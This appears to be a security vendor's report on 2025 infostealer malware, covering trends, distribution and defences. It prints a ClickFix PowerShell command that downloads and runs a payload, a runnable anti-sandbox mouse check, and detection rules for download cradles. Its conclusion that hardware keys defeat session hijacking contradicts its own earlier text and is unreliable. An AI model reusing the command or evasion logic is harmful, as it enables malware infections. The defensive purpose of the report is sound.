Executive Summary
"2025 will be remembered as the year infostealer malware industrialized. Over 204 million credentials exposed. A 160% surge in credential theft. And despite significant law enforcement victories, the MaaS economy keeps shipping product."
As we close out 2025, the numbers tell an unambiguous story: infostealers have become the dominant force in the cybercrime ecosystem. These aren't the crude keyloggers of a decade ago. Today's infostealers are sophisticated, modular, subscription-based malware platforms that extract everything from browser passwords to cryptocurrency seeds to facial recognition data.
This report synthesizes intelligence from the CovertLabs platform, law enforcement disclosures, security vendor research, and our own analysis of stealer log marketplaces. We cover the major developments of Q4 2025, contextualize them within the year's broader trends, and provide actionable guidance for defenders heading into 2026.
By the Numbers: 2025 in Review
According to KELA's Midyear Threat Report, the first half of 2025 saw 2.67 million machines compromised by infostealer malware, exposing over 204 million credentials. This represents a 24% increase over the same period in 2024.
The SpyCloud Identity Exposure Report found that credential theft now accounts for one in five data breaches, a 160% year-over-year increase. In a single month, 14,000 cases of exposed employee credentials were reported across monitored organizations.
Perhaps most concerning: businesses take an average of 94 days to remediate leaked credentials found in GitHub repositories and other public sources. That's three months of exposure, during which attackers can establish persistence, move laterally, and exfiltrate data.
The Big Three: Dominant Infostealers of 2025
1. LummaC2: The Undisputed Champion
LummaC2 (also known as Lumma Stealer) dominated the threat landscape with over 23.3 million detections in 2025. At its February peak, the malware achieved 204,045 detections in a single day. By mid-year, LummaC2 accounted for nearly 90% of all observed infostealer activity.
What makes LummaC2 so effective? A combination of technical sophistication and operational resilience:
```
// Target Data Categories
- Browser credentials (Chrome, Firefox, Edge, Opera, Brave)
- Cryptocurrency wallets (60+ wallet applications)
- Session tokens and cookies
- Two-factor authentication data
- Credit card autofill data
- System fingerprints and screenshots

// Evasion Techniques
- Process hollowing (impersonates legitimate processes)
- Obfuscated PowerShell execution
- Living-off-the-Land binaries (mshta.exe, wscript.exe)
- Trigonometric anti-sandbox detection
- Legitimate platform C2 (Steam, Google Forms, Telegram)
```
The latest LummaC2 variants (v4.0+) employ a novel anti-analysis technique: they use trigonometric calculations to analyze mouse movement patterns, delaying execution until human-like cursor activity is detected. This defeats automated sandbox analysis that relies on static mouse positions or programmatic movement.
The check, reconstructed as runnable Python from the reported logic (the threshold value is illustrative; the 50 ms sampling loop is represented by the `positions` argument):

```python
import math
import statistics

THRESHOLD = 0.25  # variance of movement angles below this looks scripted


def detect_human_mouse(positions, threshold=THRESHOLD):
    """positions: cursor samples (x, y) collected at a 50 ms interval;
    the malware gathers roughly 50 of them before deciding."""
    angles = []
    for i in range(1, len(positions)):
        # Calculate angle between consecutive movements
        dx = positions[i][0] - positions[i - 1][0]
        dy = positions[i][1] - positions[i - 1][1]
        angles.append(math.atan2(dy, dx))
    # Human movement has irregular angles;
    # sandbox scripts produce linear/predictable patterns (or no movement at all)
    if len(angles) < 2 or statistics.pvariance(angles) < threshold:
        return "SANDBOX_DETECTED"
    return "HUMAN_DETECTED"
```

In May 2025, a coordinated international operation involving Microsoft, the FBI, Europol, and security vendor ESET targeted LummaC2 infrastructure. The takedown disrupted operations temporarily, but post-crackdown analysis by Twilight Cyber revealed that command-and-control servers remained operational and infection rates rebounded within weeks.
By Q4 2025, LummaC2 infection rates had returned to an average of 4,000 new cases per day. The malware's resilience demonstrates a sobering reality: even well-coordinated law enforcement actions provide only temporary disruption against well-architected criminal infrastructure.
2. Formbook: The Silent Workhorse
While LummaC2 grabbed headlines, ESET's H2 2025 Threat Report documented Formbook overtaking the long-dominant Agent Tesla as the leading infostealer by certain metrics. Formbook's strength lies in its versatility: it functions as both an infostealer and a general-purpose remote access tool.
Formbook campaigns in Q4 2025 heavily targeted:
- Manufacturing sector: Invoice-themed phishing with malicious Excel attachments
- Logistics companies: Fake shipping notifications from DHL, FedEx, UPS
- Financial services: Spoofed wire transfer confirmations
3. Atomic Stealer: macOS Under Fire
The myth of macOS immunity finally died in 2025. Jamf's Security 360 Report documented a 28% spike in infostealer infections among Mac users, making infostealers the leading malware family on the platform.
Atomic Stealer (AMOS) led the macOS assault with 118,436 total detections in 2025. Unlike the constant high-volume activity of Windows stealers, Atomic Stealer showed highly volatile patterns: a single day in August recorded 10,689 detections, followed by periods of near-zero activity. This suggests targeted campaigns rather than mass distribution, likely aimed at high-value enterprise Mac users.
Atomic Stealer's collection scope:

| Browser Data | Cryptocurrency | System Access | Applications |
|---|---|---|---|
| Safari keychain credentials | Exodus wallet | Keychain database | Telegram sessions |
| Chrome/Firefox passwords | Electrum wallet | Notes application | Discord tokens |
| Cookies and session tokens | Coinomi wallet | Desktop files | FileZilla credentials |
| Autofill data | Browser extension wallets | Documents folder | SSH keys |
Q4 2025: New Threats Emerge
SantaStealer: The Holiday Season's Unwanted Gift
Just in time for the holidays, security researchers (with coverage from TechRadar and others) identified SantaStealer, a new malware strain derived from the earlier BluelineStealer. First observed in underground forums in late November 2025, SantaStealer has rapidly gained adoption due to its extensive feature set.
| Feature | Details |
|---|---|
| Origin | Derived from BluelineStealer codebase |
| Distribution Model | MaaS via Telegram and underground forums |
| Pricing | $175–$300/month subscription |
| Collection Modules | 14 separate data extraction modules |
| Data Exfiltration | In-memory compression, 10MB chunks to C2 |
| Notable Features | Chrome App Bound Encryption bypass, delayed execution |
SantaStealer's 14 data collection modules target an exhaustive range of information:
- Browser credentials: Passwords, cookies, autofill, payment cards
- Cryptocurrency wallets: Desktop and browser extension wallets
- Messaging applications: Telegram, Discord, Signal sessions
- Local documents: Files matching sensitive extensions (.txt, .doc, .pdf, .key)
- Desktop screenshots: Captured at configurable intervals
- System information: Hardware IDs, installed software, network configuration
The malware stores stolen data in memory rather than writing to disk, compresses it, and exfiltrates to C2 servers in 10MB chunks. This approach minimizes forensic artifacts on the host and helps evade endpoint detection rules that monitor for suspicious file operations; the outbound transfer itself, however, remains visible in network telemetry, which is where detection effort should shift.
Most notably, SantaStealer includes a working bypass for Chrome's App Bound Encryption, Google's 2024 security feature designed to prevent malware from accessing Chrome's cookie and credential stores. The bypass works by injecting into legitimate Chrome processes rather than attempting to decrypt the protected database directly.
Acreed: Rising from LummaC2's Shadow
When the May 2025 takedown temporarily disrupted LummaC2, the criminal ecosystem didn't pause. According to Dark Reading, the Acreed infostealer quickly filled the gap, gaining significant market share among MaaS customers looking for alternatives.
Acreed demonstrates how the infostealer economy has matured: when one vendor experiences disruption, customers simply migrate to competitors. The underlying business model, distribution channels, and customer base persist across individual malware families.
Distribution Evolution: How Infostealers Spread in 2025
Phishing: Still the King
Phishing remains the dominant delivery vector. IBM X-Force data shows an 84% increase in infostealers delivered via phishing emails in 2024 compared to 2023, with early 2025 data indicating a 180% surge over 2023 baselines.
Q4 2025 phishing campaigns heavily leveraged:
- AI-generated content: Grammatically perfect, contextually relevant lures
- Cloud-hosted payloads: Malicious files hosted on Azure Blob Storage, AWS S3, and Google Cloud to bypass reputation filters
- Thread hijacking: Infostealers used stolen email credentials to inject malicious replies into legitimate conversation threads
SEO Poisoning and Malvertising
Infostealers increasingly reach victims through search engine optimization (SEO) poisoning. Criminals create convincing clone websites for popular software—cracked applications, gaming cheats, productivity tools—and purchase search ads or manipulate organic rankings to appear at the top of results.
```
// Software cracks and keygens
"Adobe Photoshop 2025 crack download free"
"Microsoft Office 365 activation key generator"
"AutoCAD 2025 full version crack"

// Gaming and streaming
"FIFA 25 coin generator no survey"
"Valorant aimbot undetected 2025"
"Netflix premium account generator"

// Cryptocurrency tools
"Solana arbitrage bot free download"
"MEV bot ethereum 2025"
"Binance trading bot crack"

// AI tools (increasingly popular)
"ChatGPT Plus free access"
"Midjourney crack download"
"Sora video generator free"
```
The April 2025 Infostealer Trend Report documented distribution posts placed on legitimate platforms including forums, Q&A sites, Pinterest, and SlideShare. By using established domains, attackers bypass search engine safety filters that would flag newly registered sites.
ClickFix: Social Engineering Innovation
One of the more innovative distribution techniques of 2025 has been the "ClickFix" attack pattern, heavily associated with LummaC2 campaigns. The attack presents victims with fake error messages or CAPTCHA prompts that instruct them to:
- Press Win+R to open the Run dialog
- Paste clipboard contents (pre-loaded by the malicious page via JavaScript)
- Press Enter to "fix" the supposed problem
The clipboard contains an obfuscated PowerShell command that downloads and executes the infostealer payload. This technique bypasses many security controls because the user manually initiates execution.
A typical payload, shown de-obfuscated:

```powershell
powershell -w hidden -ep bypass -c "$url = 'https://legitimate-looking-cdn[.]com/update.exe'; $path = $env:TEMP + '\svchost.exe'; (New-Object Net.WebClient).DownloadFile($url, $path); Start-Process $path -WindowStyle Hidden"
```
Law Enforcement Strikes Back: Operation Endgame
November 2025 brought a major law enforcement victory. Europol announced a coordinated operation under the Operation Endgame banner that simultaneously targeted three major malware networks:
- Rhadamanthys: A sophisticated infostealer known for its modular architecture and cryptocurrency targeting
- VenomRAT: A remote access trojan frequently bundled with infostealers to provide persistent backdoor access
- Elysium botnet: An infrastructure network used to distribute multiple malware families
Operations spanned Germany, Greece, and the Netherlands, with coordination from Europol's European Cybercrime Centre (EC3). The seized infrastructure had infected hundreds of thousands of systems globally, collecting millions of credentials and accessing over 100,000 cryptocurrency wallets.
While significant, the operation's long-term impact remains to be seen. History suggests—as with the LummaC2 and Raccoon Stealer takedowns—that operators will rebuild infrastructure, migrate to new domains, and resume operations within weeks to months.
AI Integration: The Next Frontier
2025 marked the year infostealers began weaponizing artificial intelligence—not in their operation, but in their distribution and social engineering:
AI Tool Impersonation
ESET's research documented infostealers masquerading as popular generative AI tools:
- Midjourney: Fake "desktop apps" promising offline image generation
- Sora: Supposed early access to OpenAI's video generation tool
- Gemini: "Premium" versions claiming enhanced capabilities
- ChatGPT: Desktop clients and browser extensions with hidden payloads
These lures exploit the massive public interest in AI tools, particularly among users unfamiliar with the legitimate distribution channels.
GoldPickaxe: Stealing Your Face
Perhaps the most disturbing threat tracked in 2025 was GoldPickaxe, a mobile malware first documented by Group-IB in early 2024 that steals facial recognition data to create deepfake videos. These synthetic videos are then used to bypass facial recognition authentication at financial institutions.
The attack chain:
- Victim installs trojanized app (often disguised as government service or banking app)
- Malware captures facial recognition data via camera access
- Attackers generate deepfake video using stolen biometrics
- Deepfake passes facial verification at target institution
- Attackers gain account access or approve fraudulent transactions
This represents a fundamental shift: credentials can be changed, but biometrics cannot. Once stolen, facial recognition data provides attackers with reusable authentication material for as long as the relying party accepts a presented face without liveness checks or binding to a trusted device.
Geographic and Demographic Patterns
Credential exposure in 2025 followed predictable but important geographic patterns:
| Country | Exposure Rate | Primary Targets |
|---|---|---|
| Brazil | 7.64% | Banking, social media |
| India | 7.10% | E-commerce, gaming |
| Indonesia | 6.8% | Mobile banking, crypto |
| Vietnam | 6.2% | Gaming, social platforms |
| United States | 4.9% | Enterprise, financial services |
The most commonly targeted platforms globally:
- Discord: Session tokens enable full account takeover
- Microsoft/Azure: Corporate credentials for lateral movement
- Facebook/Meta: Ad account access for malvertising
- Gmail/Google: Password recovery for other services
- Roblox: Virtual currency theft targeting younger users
The Credential Economy: What Happens to Stolen Data
Stolen credentials don't sit idle. They flow through a sophisticated underground economy with multiple monetization paths:
Log Marketplaces
Dedicated marketplaces aggregate and sell stealer logs. Buyers can search by:
- Domain: Target specific companies or services
- Geography: Filter by victim country
- Log freshness: Recent logs command premium prices
- Account indicators: Verified email, payment methods linked, etc.
Russian Market and 2easy remain the dominant platforms, having absorbed market share after the Genesis Market takedown in 2023.
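Defenders can run the same domain search over their own stealer-log feed. The following is an added example (not CovertLabs code) that parses a constructed log in the colon-separated `URL:USER:PASSWORD` layout many dumps use, filters hits for a hypothetical monitored domain, and flags passwords reused between a personal service and the corporate domain, which is the case that turns a consumer infection into corporate exposure. The log lines, the `example-corp.com` domain and the credential values are all made up.

```python
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample log in the colon-separated URL:USER:PASSWORD layout
# common to stealer-log dumps. Every value is made up for illustration.
SAMPLE_LOG = """\
https://sso.example-corp.com/login:j.doe@example-corp.com:Winter2025!
https://mail.google.com/:jdoe.personal@gmail.com:Winter2025!
https://discord.com/login:jdoe:hunter2
https://vpn.example-corp.com:8443/remote/login:j.doe:Winter2025!
https://www.roblox.com/login:kidaccount:roblox123
not a credential line
"""

MONITORED_DOMAINS = {"example-corp.com"}  # hypothetical corporate domain


def parse_line(line):
    """Split URL:USER:PASSWORD from the right so that ':' inside the URL
    (scheme, port) survives. Assumes user and password contain no ':'."""
    parts = line.strip().rsplit(":", 2)
    if len(parts) != 3 or "://" not in parts[0]:
        return None
    url, user, password = parts
    host = (urlsplit(url).hostname or "").lower()
    return {"host": host, "user": user, "password": password}


def in_scope(host, monitored):
    return any(host == d or host.endswith("." + d) for d in monitored)


def triage(log_text, monitored=MONITORED_DOMAINS):
    """Return monitored-domain hits and passwords reused across hosts.
    A production pipeline would hash passwords before storing anything."""
    hits = []
    hosts_by_password = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hosts_by_password[rec["password"]].add(rec["host"])
        if in_scope(rec["host"], monitored):
            hits.append(rec)
    # Reuse that bridges a personal service and a monitored domain is the
    # case where a consumer infection turns into corporate exposure.
    bridging = {
        pw: sorted(hosts)
        for pw, hosts in hosts_by_password.items()
        if len(hosts) > 1
        and any(in_scope(h, monitored) for h in hosts)
        and not all(in_scope(h, monitored) for h in hosts)
    }
    return {"hits": hits, "bridging_reuse": bridging}


if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for rec in result["hits"]:
        print(f"exposed: {rec['user']} @ {rec['host']}")
    for pw, hosts in result["bridging_reuse"].items():
        print(f"one password reused across {hosts}")
```

Matching on the parsed hostname rather than substring-searching the raw URL avoids false hits on lookalike domains such as `example-corp.com.evil.test`, and the right-to-left split keeps URLs with explicit ports intact.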
Initial Access Brokerage
Corporate VPN and remote access credentials are particularly valuable. Initial access brokers (IABs) purchase these credentials from stealer operators and resell them to ransomware gangs. A single set of VPN credentials for a mid-sized company can sell for $500–$5,000; credentials for Fortune 500 companies or critical infrastructure command $10,000+.
This is the direct pipeline from infostealer infection to ransomware attack. Many of 2025's high-profile ransomware incidents trace back to stealer log-sourced initial access.
Session Hijacking
Stolen cookies enable account takeover without passwords. Attackers import the victim's session cookies into their browser, inheriting the authenticated session. Because the session was established after the victim completed MFA, the imported cookie carries that assurance with it: neither the password nor a second factor is prompted again.
In Q4 2025, we observed particularly heavy targeting of:
- AWS/Azure/GCP consoles: Cloud infrastructure access
- Okta/Azure AD: Enterprise SSO sessions
- GitHub: Source code repository access
- Coinbase/Binance: Cryptocurrency exchange sessions
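Session hijacking leaves a signal on the server side: the same session identifier presented from two different clients. The following is an added example (not from this report or any vendor) that runs two checks over constructed identity-provider activity events: a user-agent change mid-session, and use from two IP addresses within a short window. The event shape, session IDs, addresses and the 60-second window are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed activity events in the shape an IdP or reverse proxy would
# emit for an authenticated session. Not taken from any real system.
EVENTS = [
    {"ts": "2025-11-12T09:00:05Z", "session": "S1", "user": "alice",
     "ip": "203.0.113.10", "ua": "Mozilla/5.0 (Windows NT 10.0) Chrome/131.0"},
    {"ts": "2025-11-12T09:03:40Z", "session": "S1", "user": "alice",
     "ip": "203.0.113.10", "ua": "Mozilla/5.0 (Windows NT 10.0) Chrome/131.0"},
    # same cookie, different network and browser, 22 s after the last use
    {"ts": "2025-11-12T09:04:02Z", "session": "S1", "user": "alice",
     "ip": "198.51.100.77", "ua": "Mozilla/5.0 (X11; Linux x86_64) Firefox/128.0"},
    # bob roams between networks on the same phone 25 min apart: benign
    {"ts": "2025-11-12T10:15:00Z", "session": "S2", "user": "bob",
     "ip": "192.0.2.5", "ua": "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0) Safari/17"},
    {"ts": "2025-11-12T10:40:00Z", "session": "S2", "user": "bob",
     "ip": "192.0.2.99", "ua": "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0) Safari/17"},
]

CONCURRENCY_WINDOW = timedelta(seconds=60)  # illustrative tuning value


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def find_hijacked_sessions(events, window=CONCURRENCY_WINDOW):
    """Flag sessions whose identifier is presented by more than one client."""
    by_session = defaultdict(list)
    for e in events:
        by_session[e["session"]].append(e)
    findings = {}
    for sid, evs in by_session.items():
        evs.sort(key=lambda e: parse_ts(e["ts"]))
        reasons = []
        if len({e["ua"] for e in evs}) > 1:
            reasons.append("user-agent changed mid-session")
        for prev, cur in zip(evs, evs[1:]):
            gap = parse_ts(cur["ts"]) - parse_ts(prev["ts"])
            if prev["ip"] != cur["ip"] and gap <= window:
                secs = int(gap.total_seconds())
                reasons.append(f"used from {prev['ip']} and {cur['ip']} {secs}s apart")
                break
        if reasons:
            findings[sid] = {"user": evs[0]["user"], "reasons": reasons}
    return findings


if __name__ == "__main__":
    for sid, f in find_hijacked_sessions(EVENTS).items():
        print(sid, f["user"], "; ".join(f["reasons"]))
```

The user-agent check alone is weak: stealer logs include the victim's browser fingerprint, and operators routinely replay it. The concurrency check does not depend on what the attacker sends, which is why the two are combined; a real deployment would add ASN or geolocation distance and feed confirmed findings into session revocation.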
Defensive Recommendations for 2026
Based on 2025's threat evolution, we recommend the following defensive priorities:
Technical Controls
- Deploy hardware security keys: FIDO2/WebAuthn defeats credential phishing and password replay, because the authenticator signs a challenge bound to the site's origin. It does not by itself invalidate a stolen post-authentication cookie, so pair it with the session controls below: device-bound sessions where the identity provider supports them, short lifetimes, and re-authentication for sensitive actions.
- Implement conditional access: Require device compliance, known networks, and risk-based authentication for sensitive resource access.
- Monitor for stealer indicators: Detect browser database access from non-browser processes, cryptocurrency wallet directory enumeration, and suspicious PowerShell execution.
- Reduce session lifetimes: Shorter session timeouts reduce the window during which stolen cookies remain valid. Revoke active sessions when a credential appears in a stealer log, and confirm that password resets also terminate existing sessions, since on some platforms they do not.
- Deploy EDR with behavioral detection: Signature-based detection cannot keep pace with infostealer evolution. Behavioral analysis catches novel variants.
Organizational Measures
- Credential exposure monitoring: Continuously monitor stealer log marketplaces and data dumps for employee credentials. The CovertLabs platform provides this capability at scale.
- Eliminate password reuse: Enforce password managers and unique credentials. When credentials from a personal account appear in stealer logs, they shouldn't provide corporate access.
- User education on download hygiene: Train users to verify software sources. Pirated software remains the primary consumer infostealer vector.
- Extend protection to macOS: The "Macs don't get viruses" era is over. Ensure endpoint protection covers all platforms.
Starting points for endpoint detection logic (pseudo-query syntax; translate into your EDR's rule language and extend the Chrome profile path beyond `Default`):

```
# Suspicious browser credential access (Windows)
process.name != "chrome.exe" AND file.path CONTAINS "\Google\Chrome\User Data\Default\Login Data"

# Cryptocurrency wallet enumeration
file.path MATCHES "\\AppData\\(Roaming|Local)\\(Electrum|Exodus|Atomic|Coinomi)\\"

# PowerShell download cradle
process.name == "powershell.exe" AND command_line MATCHES "(DownloadFile|DownloadString|WebClient|Invoke-WebRequest)"

# mshta.exe network activity (LOLBin abuse)
process.name == "mshta.exe" AND network.connection.established == true
```
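To show how those rules behave against real-looking telemetry, here is an added example (not vendor code) that implements the four rules as Python predicates and runs them over constructed EDR-style events. The event layout, process names, paths and the `pwsh.exe`/`iwr`/`irm` additions are assumptions; the browser allowlist is deliberately minimal so that any non-Chrome reader of `Login Data` trips the first rule.

```python
import re

# Constructed endpoint telemetry shaped like EDR process/file/network events.
# Paths, binaries and command lines are illustrative.
EVENTS = [
    {"id": 1, "process": "chrome.exe",
     "file_path": r"C:\Users\j.doe\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"id": 2, "process": "update.exe",
     "file_path": r"C:\Users\j.doe\AppData\Local\Google\Chrome\User Data\Profile 1\Login Data"},
    {"id": 3, "process": "svchost.exe",
     "file_path": r"C:\Users\j.doe\AppData\Roaming\Electrum\wallets\default_wallet"},
    {"id": 4, "process": "powershell.exe",
     "command_line": r"powershell -w hidden -ep bypass -c (New-Object Net.WebClient).DownloadFile('https://cdn.example/update.exe','C:\Users\j.doe\AppData\Local\Temp\svchost.exe')"},
    {"id": 5, "process": "mshta.exe", "network_established": True},
    {"id": 6, "process": "powershell.exe", "command_line": "powershell -c Get-ChildItem C:\\"},
    {"id": 7, "process": "explorer.exe", "file_path": r"C:\Users\j.doe\Documents\notes.txt"},
]

# Chrome's own binary legitimately opens its credential store. Add sanctioned
# tooling (a validated backup agent, for example) here only after review.
BROWSER_PROCS = {"chrome.exe"}
# Any profile directory, not only "Default"
LOGIN_DATA = re.compile(r"\\Google\\Chrome\\User Data\\[^\\]+\\Login Data$", re.I)
WALLET_DIRS = re.compile(r"\\AppData\\(Roaming|Local)\\(Electrum|Exodus|Atomic|Coinomi)\\", re.I)
# The page's four cradle markers plus the iwr/irm aliases (assumed addition)
CRADLE = re.compile(r"DownloadFile|DownloadString|WebClient|Invoke-WebRequest|\biwr\b|\birm\b", re.I)


def browser_credential_access(e):
    return (e["process"].lower() not in BROWSER_PROCS
            and bool(LOGIN_DATA.search(e.get("file_path", ""))))


def wallet_enumeration(e):
    return bool(WALLET_DIRS.search(e.get("file_path", "")))


def powershell_download_cradle(e):
    return (e["process"].lower() in {"powershell.exe", "pwsh.exe"}
            and bool(CRADLE.search(e.get("command_line", ""))))


def mshta_network(e):
    return e["process"].lower() == "mshta.exe" and bool(e.get("network_established"))


RULES = [browser_credential_access, wallet_enumeration,
         powershell_download_cradle, mshta_network]


def evaluate(events, rules=RULES):
    """Return (rule name, event id) for every rule an event trips."""
    return [(rule.__name__, e["id"]) for e in events for rule in rules if rule(e)]


if __name__ == "__main__":
    for name, event_id in evaluate(EVENTS):
        print(f"event {event_id}: {name}")
```

Event 1 (Chrome reading its own store) and event 6 (an ordinary PowerShell directory listing) produce nothing; events 2 through 5 each trip exactly one rule. Expect tuning work on the first rule in environments with password-manager importers or backup software, and note that a stealer injected into a legitimate `chrome.exe` process, as described for SantaStealer's App Bound Encryption bypass, would pass the process-name check and needs memory-injection telemetry instead.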
Looking Ahead: 2026 Predictions
Based on current trajectory, we anticipate the following developments in 2026:
- Biometric data theft will accelerate: GoldPickaxe is a prototype. Expect more malware targeting facial recognition, voice prints, and behavioral biometrics.
- Mobile infostealers will mature: As mobile devices increasingly serve as authentication factors, they become more attractive targets.
- MaaS prices will continue falling: Competition among stealer operators benefits criminal buyers. Expect quality infostealers available for under $100/month.
- AI-generated phishing at scale: LLMs will enable personalized, contextually relevant phishing at volumes previously impossible.
- More law enforcement action—and more resilient criminal infrastructure: The cat-and-mouse continues. Both sides are improving.
Conclusion
The Q4 2025 infostealer landscape reflects a mature, industrialized criminal economy. The numbers are staggering: 204 million credentials exposed, 160% growth in credential theft, 23.3 million LummaC2 detections. Behind these statistics are real victims—individuals whose identities are stolen, companies whose networks are breached, and organizations whose operations are disrupted.
The good news: defenders are not helpless. Hardware security keys defeat session hijacking. Behavioral detection catches novel variants. Credential monitoring provides early warning. The tools exist; the challenge is deployment at scale.
At CovertLabs, we process and correlate stealer log data from across the criminal ecosystem. When credentials appear in underground marketplaces, our platform surfaces them before attackers can act. In the credential economy, visibility is defense.
